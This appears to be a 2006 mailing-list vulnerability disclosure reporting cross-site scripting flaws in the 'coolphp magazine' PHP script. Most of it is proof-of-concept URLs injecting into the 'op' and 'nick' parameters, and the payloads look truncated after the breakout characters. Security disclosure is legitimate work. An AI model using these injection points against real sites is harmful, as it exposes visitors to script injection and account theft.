>Subject: Multiple Xss exploits in coolphp magazine >Date: 27 May 2006 14:25:31 -0000 >Multiple Xss exploits in coolphp magazine > >script type : coolphp magazine >bug found by : black-code & sweet-devil >team : site-down >type : Xss > >Codes : > >******* > >http://www.xxx.com/coolphp/index.php?op='> > >http://www.xxx.com/coolphp/index.php?op=userinfo&nick='> > >******* > > >And : > >http://www.xxx.com/coolphp/index.php?op=0000='> > >Put instaed of 0000 any name as : > >http://xxx.net/coolphp/index.php?op=userinfo='> > >or > >http://xxx.net/coolphp/index.php?op=comp_der='> > >or > >http://xxx.net/coolphp/index.php?op=encuestas='> > >or > >http://xxx.net/coolphp/index.php?op=pagina='> > > > > >Emails : > >Black-cod3@hotmil.com > >gamr-14@hotmail.com > >All my respect to my friend sweet-devil , lezr.com , g123g.net .. > >done .. peace _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/